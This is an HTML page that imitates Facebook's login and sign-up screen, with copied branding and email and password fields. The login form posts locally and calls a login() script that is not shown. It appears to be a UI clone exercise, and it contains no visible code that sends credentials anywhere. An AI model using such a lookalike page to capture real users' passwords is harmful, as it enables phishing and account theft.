<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Facebook-log in or sign up</title>
  <link rel="apple-touch-icon" sizes="180x180" href="favicon_io/android-chrome-512x512.png">
  <link rel="icon" type="image/png" sizes="32x32" href="favicon_io/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="favicon_io/favicon-16x16.png">
  <link rel="manifest" href="favicon_io/site.webmanifest">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta3/dist/css/bootstrap.min.css" rel="stylesheet"
    integrity="sha384-eOJMYsd53ii+scO/bJGFsiCZc+5NDVN2yr8+0RDqr0Ql0h+rP48ckxlpbzKgwra6" crossorigin="anonymous">
  <style>
    * {
      margin: 0;
      padding: 0;
      background: rgb(237, 237, 238);
      overflow: hidden;
    }

    .form {
      background: white;
      position: absolute;
      top: 46%;
      left: 70%;
      width: 27rem;
      text-align: center;
      padding: 1rem;
      border-radius: 10px;
      transform: translate(-50%, -50%);
      display: block;
      box-shadow: 1px 1px 2px 2px rgb(206, 203, 203);
    }

    .form input[type="text"]:hover,
    .form input[type="password"]:hover {
      border: 0.1px solid rgb(58, 58, 160);
    }

    .form input[type="text"],
    .form input[type="password"] {
      background: none;
      display: block;
      margin: 1rem auto;
      border: 0.0001px solid rgb(196, 195, 195);
      padding: 1rem 1rem;
      width: 25rem;
      outline: none;
      color: black;
      border-radius: 5px;
    }

    .form a {
      background: none;
      text-decoration: none;
    }

    .form a:hover {
      text-decoration: underline;
    }

    .form button[type="submit"] {
      display: block;
      margin: 1rem auto;
      border: 0.0001px solid rgb(196, 195, 195);
      padding: 1rem -0.01rem;
      width: 25rem;
      outline: none;
      color: black;
      border-radius: 5px;
      color: white;
      font-weight: 1000;
      font-size: 20px;
    }

    .new {
      background: none;
    }

    .form button[type="button"] {
      background: green;
    }

    .header h1 {
      color: rgb(76, 76, 201);
      position: absolute;
      top: 34%;
      left: 25.4%;
      transform: translate(-50%, -50%);
      font-size: 55px;
      font-weight: 700;
    }

    .title h3 {
      position: absolute;
      top: 45%;
      left: 33.5%;
      transform: translate(-50%, -50%);
      font-weight: 400;
    }

    .fb {
      position: absolute;
      top: 74%;
      left: 70%;
      transform: translate(-50%, -50%);
      color: black;
    }

    .fb a {
      text-decoration: none;
      color: black;
      font-weight: 600;
    }

    .fb a:hover {
      text-decoration: underline;
    }
  </style>
</head>

<body>
  <div class="fb"><a href="#">Create a Page</a> for a celebrity, band or business.</div>
  <div class="header">
    <h1>facebook</h1>
  </div>
  <div class="title">
    <h3>Facebook helps you connect and share <br> with the people in your life.</h3>
  </div>
  <form action="facebook.html" method="POST" class="form">
    <input type="text" placeholder="Email address or phone number" id="email">
    <input type="password" placeholder="Password" id="password">
    <button type="submit" class="btn btn-primary" onclick="login()">Log In</button>
    <a href="forgotten.html">Forgotten password?</a>
    <hr>
    <div class="new">
      <button type="button" class="btn btn-primary" data-bs-toggle="modal" data-bs-target="#exampleModal">
        Create New Account
      </button>
    </div>
  </form>
  <div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="modal-title" id="exampleModalLabel">Create New Account</h5>
          <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
        </div>
        <div class="modal-body">
          <form class="row g-3">
            <div class="col-md-6">
              <input type="text" class="form-control" id="inputname14" placeholder="First name" required>
            </div>
            <div class="col-md-6">
              <input type="text" class="form-control" id="inputnamel" placeholder="Surname">
            </div>
            <div class="col-12">
              <input type="text" class="form-control" id="inputEmail4" placeholder="Mobile Number or email address"
                required>
            </div>
            <div class="col-12">
              <input type="password" class="form-control" id="inputpasswordl4" placeholder="New password">
            </div>
            <label for="formFileMultiple" class="form-label">Date of birth?</label>
            <div class="col-md-4">
              <select id="inputState" class="form-select">
                <option selected>May</option>
                <option>...</option>
              </select>
            </div>
            <div class="col-md-4">
              <select id="inputState" class="form-select">
                <option selected>05</option>
                <option>...</option>
              </select>
            </div>
            <div class="col-md-4">
              <select id="inputState" class="form-select">
                <option selected>2002</option>
                <option>...</option>
              </select>
            </div>
            <label for="formFileMultiple" class="form-label">Gender</label>
            <div class="col-md-4">
              <select id="inputState" class="form-select">
                <option selected>Male</option>
                <option>Female</option>
                <option>custom</option>
              </select>
            </div>
            <div class="col-12">
              <div class="form-check">
                <input class="form-check-input" type="checkbox" id="gridCheck">
                <label class="form-check-label" for="gridCheck">
                  Check me out
                </label>
              </div>
            </div>
            <div class="col-12">
              <button type="submit" class="btn btn-primary" onclick="createaccount()">Sign in</button>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
  <script src="facebook.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta3/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-JEW9xMcG8R+pH31jmWH6WWP0WintQrMb4s7ZOdauHnUtxwoG2vI5DkLtS3qm9Ekf"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"
    integrity="sha384-SR1sx49pcuLnqZUnnPwx6FCym0wLsk5JZuNx2bPPENzswTNFaQU1RDvt3wT4gWFG"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta3/dist/js/bootstrap.min.js"
    integrity="sha384-j0CNLUeiqtyaRmlzUHCPZ+Gy5fQu0dQ6eZ/xAww941Ai1SxSY+0EQqNXNE6DZiVc" crossorigin="anonymous"></script
</body>
</html>